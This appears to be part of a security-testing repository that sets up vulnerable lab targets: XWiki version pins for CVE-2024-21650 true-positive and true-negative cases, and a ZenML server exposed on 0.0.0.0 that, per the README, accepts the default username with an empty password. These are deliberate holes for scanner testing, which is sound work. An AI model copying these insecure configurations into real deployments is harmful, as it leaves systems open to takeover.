25 | -------------------------------------------------------------------------------- /xwiki/CVE-2024-21650/env-true-negative: -------------------------------------------------------------------------------- 1 | # Default environment values 2 | XWIKI_VERSION=15.10.4 3 | DB_USER=xwiki 4 | DB_PASSWORD=xwiki 5 | DB_DATABASE=xwiki 6 | MYSQL_ROOT_PASSWORD=xwiki 7 | -------------------------------------------------------------------------------- /xwiki/CVE-2024-21650/env-true-positive: -------------------------------------------------------------------------------- 1 | # Default environment values 2 | XWIKI_VERSION=15.7.0 3 | DB_USER=xwiki 4 | DB_PASSWORD=xwiki 5 | DB_DATABASE=xwiki 6 | MYSQL_ROOT_PASSWORD=xwiki 7 | -------------------------------------------------------------------------------- /zenml/Exposed_UI/DockerfileUnSafe: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | LABEL authors="secureness" 3 | RUN apt update \ 4 | && apt install python3.11 python3-pip python3.11-venv -y 5 | RUN mkdir zenml 6 | WORKDIR zenml 7 | 8 | RUN python3.11 -m venv .venv 9 | RUN bash -c "source .venv/bin/activate && pip install zenml[server]" 10 | 11 | ENTRYPOINT ["bash","-c","source .venv/bin/activate && zenml up --ip-address 0.0.0.0 --port 8080 && sleep 100000"] 12 | -------------------------------------------------------------------------------- /zenml/Exposed_UI/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Common steps for both safe and unsafe zenml instances 3 | First, install the docker on your host machine. 4 | for running both safe and unsafe zenml instances execute `docker compose up` in this directory. 5 | 6 | # Access to the unsafe instance 7 | On the host machine, you can navigate to http://172.20.0.2:8080/ to access the platform. 8 | You can now log in by using a default credential, username is `default`, and leave the password field empty. 
9 | 10 | # Access to the safe instance 11 | On the host machine, you can navigate to http://172.20.0.3:8080/ to access the platform. It will ask you to set a username and password, so no weak credentials exist in this instance. 12 | -------------------------------------------------------------------------------- /zenml/Exposed_UI/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | networks: 4 | zenml: 5 | ipam: 6 | config: 7 | - subnet: 172.20.0.0/24 8 | 9 | services: 10 | zenml_unsafe: 11 | container_name: zenml_unsafe 12 | build: 13 | dockerfile: DockerfileUnSafe 14 | networks: 15 | zenml: 16 | ipv4_address: 172.20.0.2 17 | ports: 18 | - "8080" 19 | zenml_safe: 20 | container_name: zenml_safe 21 | image: zenmldocker/zenml-server:0.58.2 22 | networks: 23 | zenml: 24 | ipv4_address: 172.20.0.3 25 | ports: 26 | - "8080" --------------------------------------------------------------------------------